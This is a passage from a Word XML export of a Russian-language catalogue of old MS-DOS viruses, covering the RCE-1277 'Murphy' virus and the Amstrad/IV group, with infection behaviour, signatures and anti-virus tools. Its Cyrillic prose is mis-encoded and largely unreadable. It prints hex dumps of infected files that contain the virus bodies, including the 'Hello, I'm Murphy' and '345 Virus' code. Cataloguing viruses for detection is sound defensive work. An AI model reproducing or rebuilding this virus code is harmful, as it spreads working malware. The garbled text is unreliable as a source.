        <w:rPr/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>25307 ���⮢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�� ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ����� �������� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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 ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ����� �� ���⠫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠥ� ����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 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠ � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祣� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠡ��ᯮᮡ�� �� �� ���ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�ઠ ����� ���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⥫� ����� �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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1277 ���⮢, ��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ᮧ����� � ��ਡ��� ������� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��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⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᢮�  ⥫�  �  �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 � ���� �� ���� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �� ��砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">࠭��� ��ࠣ�� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ��  �믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1277 (6Fh) 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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �믮������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭���⭮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楫�� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந������ ����⫥��� �� ���� �⫠�������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. 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⪥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��� �� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭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⭮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ABO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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㡫���樥� ����� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �᫨  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室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���  ���  ��ப�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � RCE-1277 ����� ������᪮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>宦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ᠭ �ࠢ��⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 �������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�����/�������  1989  �.?).  �  ����� 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 � ����) ���� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦨� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">客殢 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(��� 19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ଠ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⢥ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮�� �������� ����訢����� ᫮�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MER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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢���� �������� �� �ਢ����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠡�.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨣ����ࠬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. 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�� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠤�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>V1277.EXE, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-1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: 4D 5A D9 00 06 00 01 00  20 00 00 00 FF FF 35 00  MZ...... ....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: 18 00 85 99 0C 00 3D 00  1E 00 00 00 01 00 01 00  ......=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: 37 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  7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0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00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...   ...   ...   ...    ...   ...   ...   ...    ...   ...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60: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00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70: B8 00 00 8E D8 BA 00 00  B4 09 CD 21 BA 2D 00 B4  ...........!.-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80: 09 CD 21 BA 5A 00 B4 09  CD 21 BA 87 00 B4 09 CD  ..!.Z....!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90: 21 BA B4 00 B4 09 CD 21  BA E1 00 B4 09 CD 21 BA  !......!......!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A0: 0E 01 B4 09 CD 21 B0 01  B4 2E CD 21 B4 19 CD 21  .....!.....!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>05B0: A2 41 03 BB 3D 01 8B 0E  3B 01 8B 16 3D 03 CD 25  .A..=...;...=..%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>05C0: A0 41 03 BB 3D 01 8B 0E  3B 01 8B 16 3F 03 CD 26  .A..=...;...?..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05D0: B0 00 B4 2E CD 21 B4 01  B4 4C CD 21 E9 7E 03 4D  .....!...L.!.~.M</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>05E0: 5A D9 00 06 00 01 00 20  00 00 00 FF FF 35 00 18  Z...... .....5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F0: 00 85 99 0C 00 3D 00 00  00 37 00 3D 00 38 22 21  .....=...7.=.8"!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0: 00 DC 01 03 00 60 14 2B  02 56 05 EF 0E ED 02 00  .....`.+.V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10: C8 7A 0F 70 00 20 48 65  6C 6C 6F 2C 20 49 27 6D  .z.p. Hello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0620: 20 4D 75 72 70 68 79 2E  20 4E 69 63 65 20 74 6F   Murphy. N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630: 20 6D 65 65 74 20 79 6F  75 20 66 72 69 65 6E 64   meet you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640: 2E 20 49 27 6D 20 77 72  69 74 74 65 6E 20 73 69  . I'm written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0650: 6E 63 65 20 4E 6F 76 2F  44 65 63 2E 20 43 6F 70  nce Nov/Dec. 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0660: 79 77 72 69 74 65 20 28  63 29 31 39 38 39 20 62  ywrite (c)1989 b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0670: 79 20 4C 75 62 6F 20 26  20 49 61 6E 2C 20 53 6F  y Lubo &amp; Ia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0680: 66 69 61 2C 20 55 53 4D  20 4C 61 62 6F 72 61 74  fia, USM Labo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690: 6F 72 79 2E 20 E8 8F 02  3D 59 4B 75 09 55 8B EC  ory. ...=YKu.U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A0: 83 66 06 FE 5D CF 80 FC  4B 74 12 3D 00 3D 74 0D  .f..]...Kt.=.=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B0: 3D 00 6C 75 05 80 FB 00  74 03 E9 A5 00 06 1E 57  =.lu....t......W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>06C0: 56 55 52 51 53 50 E8 C9  01 3D 00 6C 75 02 8B D6  VURQSP...=.l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D0: B9 80 00 8B F2 46 8A 04  0A C0 E0 F9 83 EE 02 81  .....F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E0: 3C 4F 4D 74 12 81 3C 58  45 74 03 EB 69 90 81 7C  &lt;OMt..&lt;XEt..i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06F0: FE 2E 45 74 09 EB F4 81  7C FE 2E 43 75 ED B8 02  ..Et....|..C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0: 3D E8 87 01 72 50 8B D8  B8 00 57 E8 7D 01 2E 89  =...rP....W.}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0: 0E 21 01 2E 89 16 23 01  B8 00 42 33 C9 33 D2 E8  .!....#...B3.3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0: 69 01 0E 1F BA 03 01 8B  F2 B9 18 00 B4 3F E8 5A  i............?.Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0730: 01 72 0E 81 3C 4D 5A 75  05 E8 2B 00 EB 03 E8 F6  .r..&lt;MZu..+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0: 00 B8 01 57 2E 8B 0E 21  01 2E 8B 16 23 01 E8 3A  ...W...!....#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0750: 01 B4 3E E8 35 01 E8 76  01 58 5B 59 5A 5D 5E 5F  ..&gt;.5..v.X[YZ]^_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0: 1F 07 2E FF 2E 29 01 8B  4C 16 03 4C 08 B8 10 00  .....)..L..L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0: F7 E1 03 44 14 83 D2 00  52 50 B8 02 42 33 C9 33  ...D....RP..B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0780: D2 E8 07 01 83 FA 00 75  0B 3D FD 04 90 73 05 58  .......u.=...s.X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0790: 5A E9 85 00 8B F8 8B EA  59 2B C1 59 1B D1 83 7C  Z.......Y+.Y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07A0: 0C 00 74 75 83 FA 00 75  06 3D FD 04 90 74 6A 8B  ..tu...u.=...tj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B0: D5 8B C7 52 50 05 FD 04  90 83 D2 00 B9 00 02 F7  ...RP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C0: F1 C4 7C 02 2E 89 3E 25  01 2E 8C 06 27 01 89 54  ..|...&gt;%....'..T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07D0: 02 83 FA 00 74 01 40 89  44 04 58 5A E8 3B 00 2B  ....t.@.D.XZ.;.+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07E0: 44 08 C4 7C 14 89 3E 1B  01 8C 06 1D 01 89 54 14  D..|..&gt;......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F0: 89 44 16 A3 1F 01 B8 02  42 33 C9 33 D2 E8 8B 00  .D......B3.3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0: E8 28 00 72 14 B8 00 42  33 C9 33 D2 E8 7C 00 B4  .(.r...B3.3..|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0: 40 8B D6 B9 18 00 E8 72  00 C3 B9 04 00 8B F8 83  @......r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0: E7 0F D1 EA D1 D8 E2 FA  8B D7 C3 B4 40 B9 FD 04  ............@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0: 90 BA 00 01 EB 55 90 B8  02 42 33 C9 33 D2 E8 4A  .....U...B3.3..J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0: 00 3D FD 04 90 72 43 3D  E2 FA 90 73 3D 50 80 3C  .=...rC=...s=P.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0: E9 75 0C 2D 00 05 90 3B  44 01 75 03 58 EB 2B E8  .u.-...;D.u.X.+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0: C9 FF 73 03 58 EB 23 B8  00 42 33 C9 33 D2 E8 1A  ..s.X.#..B3.3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70: 00 58 2D 03 00 BA 1B 01  8B F2 2E C6 04 E9 2E 89  .X-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0: 44 01 B4 40 B9 03 00 E8  01 00 C3 9C 2E FF 1E 29  D..@.......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0: 01 C3 50 1E 06 33 C0 50  1F FA C4 06 90 00 2E A3  ..P..3.P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A0: 2D 01 2E 8C 06 2F 01 B8  18 04 A3 90 00 8C 0E 92  -..../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B0: 00 C4 06 4C 00 2E A3 35  01 2E 8C 06 37 01 2E C4  ...L...5....7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C0: 06 31 01 A3 4C 00 8C 06  4E 00 FB 07 1F 58 C3 50  .1..L...N....X.P</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>08D0: 1E 06 33 C0 50 1F FA 2E  C4 06 2D 01 A3 90 00 8C  ..3.P.....-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E0: 06 92 00 2E C4 06 35 01  A3 4C 00 8C 06 4E 00 FB  ......5..L...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F0: 07 1F 58 C3 F6 C4 80 74  05 2E FF 2E 2D 01 83 C4  ..X....t....-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...   ...   ...   ...    ...   ...   ...   ...    ...   ...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E0: 75 0A 46 AD 3D CD 40 74  0A 83 EE 03 4E 4E 4E E2  u.F.=.@t....N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F0: D8 EB 0D 83 EE 07 2E 89  B5 AC FC 2E 8C 9D AE FC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00: B4 62 CD 21 8E C3 B4 49  CD 21 BB FF FF B4 48 CD  .b.!...I.!...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10: 21 81 EB 51 00 72 7C 8C  C1 F9 13 CB B4 4A CD 21  !..Q.r|......J.!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0A20: BB 50 00 90 F9 26 19 1E  02 00 06 8E C1 B4 4A CD  .P...&amp;........J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30: 21 8C C0 48 8E D8 C7 06  01 00 08 00 E8 09 FF 8B  !..H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40: D8 8B CA 1F 8C D8 E8 FF  FE 03 06 06 00 83 D2 00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50: 2B C3 1B D1 72 04 29 06  06 00 8B F7 33 FF 0E 1F  +...r.).....3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60: 81 EE 85 03 B9 FD 04 90  41 F3 A4 B4 62 CD 21 4B  ........A...b.!K</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0A70: 8E DB C6 06 00 00 5A BA  B9 01 33 C0 50 1F 8C C0  ......Z...3.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80: 2D 10 00 8E C0 FA 89 16  84 00 8C 06 86 00 FB FE  -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90: 0E 7B 04 5E 2E 81 BC 7E  FC 4D 5A 75 1D 1F 2E 8B  .{.^...~.MZu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A0: 84 9A FC 2E 8B 9C 98 FC  0E 59 2B C8 03 CB 51 2E  .........Y+...Q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B0: FF B4 96 FC 1E 07 E8 95  FE CB 58 2E 8B 84 7E FC  ..........X...~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C0: 2E A3 00 01 2E 8B 84 80  FC 2E A3 02 01 B8 00 01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D0: 50 0E 1F 1E 07 E8 76 FE  C3                       P.....v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7. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IV (Amstr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㯯�  �  �����饥  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� ��⮨� �� ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�⥫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847,  740 � 345 ����.  �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t xml:space="preserve">ﭨ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ���� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫�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  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㪢� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"IV".  �� �⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN �������� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IV-847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 ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"Amstrad Virus [Amst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⮩ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-�������� ����� ��������  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쪮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㫨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饬 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>४�ਨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬 �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �� �।�ᬮ�७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���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �ந�������� �ਯ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⥫� ����� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫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.1. C-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᫥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �����筮 ��� ����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ணࠬ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뤠��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"Program sick error:Call doctor or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for cure descrip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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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祭� ��宦� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ����� ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㡫������ � ���� ��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⥪�� � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-� �������.  � ���� ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫쭮 �����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᭮� ��᪥� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣�� ��� ������� ����� �� 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䠣 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.�����᪮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ଠ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.�.�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IV-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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN ����� ����� �� ��⥪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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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祭�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����� ����ᮬ ����� �ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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䠣 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDSTEST �.�.�����᪮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ࠣ���� �஧�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����ᮬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-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: EB 3B 49 56 01 2A 2E 43  4F 4D 00 00 00 00 00 00   .;IV.*.COM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: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 0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: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 0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0: 00 00 00 00 00 00 00 00  00 00 00 00 00 50 8C C8   .............P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: 05 00 10 8E C0 FE 06 04  01 BE 00 01 33 FF B9 59   ............3..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0: 01 90 F3 A4 BA 11 01 B4  1A CD 21 BA 05 01 B9 06   ..........!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0: 00 B4 4E CD 21 72 4B BA  2F 01 B8 02 3D CD 21 8B   ..N.!rK./...=.!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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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0: D8 01 B4 09 CD 21 CD 20  50 72 6F 67 72 61 6D 20   .....!.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0: 73 69 63 6B 20 65 72 72  6F 72 3A 43 61 6C 6C 20   sick error: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0F0: 64 6F 63 74 6F 72 20 6F  72 20 62 75 79 20 50 49   doctor or buy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: 58 45 4C 20 66 6F 72 20  63 75 72 65 20 64 65 73   XEL for cur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: 63 72 69 70 74 69 6F 6E  0A 0D 24 BE 37 02 B9 22   cription..$.7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0: 00 33 FF F3 A4 5B 2E C7  06 0B 01 00 00 2E 8C 06   .3...[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0: 0D 01 2E FF 2E 0B 01 1E  07 BE 59 02 BF 00 01 B9   ..........Y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0: FF FF 2B CE F3 A4 2E C7  06 00 01 00 01 2E 8C 1E   ..+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0: 02 01 8B C3 2E FF 2E 00  01 B4 09 BA 09 01 CD 21   ............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0: CD 20 33 34 35 20 56 69  72 75 73 20 33 34 35 20   . 345 Virus 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0: 62 79 74 65 73 20 21 24                            bytes !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.2. C-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᫥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �����筮 ��� ����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ணࠬ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뤠��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">饭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"Program sick error:Call doctor or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for cure descrip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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᥭ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 ���� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮� ��᪥� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ଠ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.�.�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IV-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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"Amstrad Virus [Amst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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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祭�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����� ����ᮬ ����� �ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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䠣 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDSTEST �.�.�����᪮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ࠣ���� �஧�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����ᮬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
